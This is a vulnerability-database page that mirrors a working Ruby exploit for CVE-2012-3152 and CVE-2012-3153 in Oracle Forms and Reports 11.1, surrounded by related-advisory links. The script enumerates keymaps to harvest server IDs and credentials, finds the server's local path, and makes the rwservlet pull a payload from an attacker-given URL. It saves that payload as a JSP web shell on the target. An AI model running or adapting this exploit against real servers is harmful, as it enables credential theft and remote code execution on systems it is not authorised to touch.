Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Forms and Reports 11.1 - Remote Exploit

🗓️ 29 Jan 2014 00:00:00Reported by MekanismenType 
zdt
 zdt🔗 0day.today👁 135 Views

Automated exploit for CVE-2012-3152 / CVE-2012-3153, uploads payload to Oracle Forms and Reports 11.1 through remote exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Oracle Reports Developer Version Release 9i to 10gr2 Database Disclosure
29 Jan 201400:00
zdt
0day.today		Oracle Forms / Reports Remote Code Execution Exploit
18 Feb 201400:00
zdt
GithubExploit		Exploit for CVE-2012-3152
15 May 202620:47
githubexploit
ATTACKERKB		CVE-2012-3153
16 Oct 201200:00
attackerkb
ATTACKERKB		CVE-2012-3152
16 Oct 201200:00
attackerkb
BDU FSTEC		The vulnerability of the Oracle Reports Developer component of the Oracle Fusion Middleware software platform allows attackers to influence the integrity and confidentiality of the protected information.
1 Dec 202100:00
bdu_fstec
Circl		CVE-2012-3152
18 Feb 201400:00
circl
Circl		CVE-2012-3153
29 May 201815:50
circl
CISA KEV Catalog		Oracle Fusion Middleware Unspecified Vulnerability
3 Nov 202100:00
cisa_kev
Check Point Advisories		Oracle Fusion Middleware Showmap Servlet Information Disclosure (CVE-2012-3152; CVE-2012-3153)
6 Feb 201400:00
checkpoint_advisories
Rows per page
require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
 
def upload_payload(dest)
  url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
  #print url 
  begin
  uri = URI.parse(url)
  html = uri.open.read
  rescue
    html = ""
  end
   
  if html =~ /Successfully run/
    @hacked = true
    print "[+] Payload uploaded!\n"
  else
    print "[-] Payload uploaded failed\n"
  end
end
 
def getenv(server, authid)
  print "[+] Found server: #{server}\n"
  print "[+] Found credentials: #{authid}\n"
  print "[*] Querying showenv ... \n"
  begin
    uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
    html = uri.open.read
  rescue
    html = ""
  end
 
  if html =~ /\/(.*)\/showenv/ 
    print "[+] Query succeeded, uploading payload ... \n"
    upload_payload($1)
  else
    print "[-] Query failed... \n"
  end
end
 
@payload_url = ""         #the url that holds our payload (we can execute .jsp on the server)
@url = ""                 #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp"
 
print "[*] PWNACLE Fusion - Mekanismen <[email protected]>\n"
print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print "[*] Credits to: @miss_sudo\n"
 
unless ARGV[0] and ARGV[1]
  print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
  exit
end
 
@url =  ARGV[0]
@payload_url =  ARGV[1]
print "[*] Target URL: #{@url}\n"
print "[*] Payload URL: #{@payload_url}\n"
print "[*] Payload name: #{@payload_name}\n"
 
begin
#Can we view keymaps?
uri = URI.parse("#{@url}/reports/rwservlet/showmap")
html = uri.open.read
rescue
  print "[-] URL not vulnerable or unreachable\n"
  exit
end
 
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
 
#Parse keymaps for servers
print "[*] Enumerating keymaps ... \n"
test.each do |t|
  if not @hacked
    t = t.delete(' ')
    url = "#{@url}/reports/rwservlet/parsequery?#{t}"
 
  begin
    uri = URI.parse(url)
    html = uri.open.read
    rescue
  end
   
  #to automate exploitation we need to query showenv for a local path
  #we need a server id and creds for this, we enumerate the keymaps and hope for the best
  #showenv tells us the local PATH of /reports/ where we upload the shell
  #so we can reach it from /reports/images/<shell>.jsp 
 
  if html =~ /userid=(.*)@/
    authid = $1
  end
  if html =~ /server=(\S*)/ 
    server = $1
  end
 
  if server and authid
    getenv(server, authid)
  end
  else
    break
  end
end
 
if @hacked
  print "[*] Server hopefully compromised!\n"
  print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
  print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
  #server is still vulnerable but cannot be automatically exploited ... i guess
end

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Jan 2014 00:00Current
9.3High risk
Vulners AI Score9.3
EPSS0.93535
automatedoracleforms and reportscve-2012-3152cve-2012-3153uploadpayloadremote exploit
135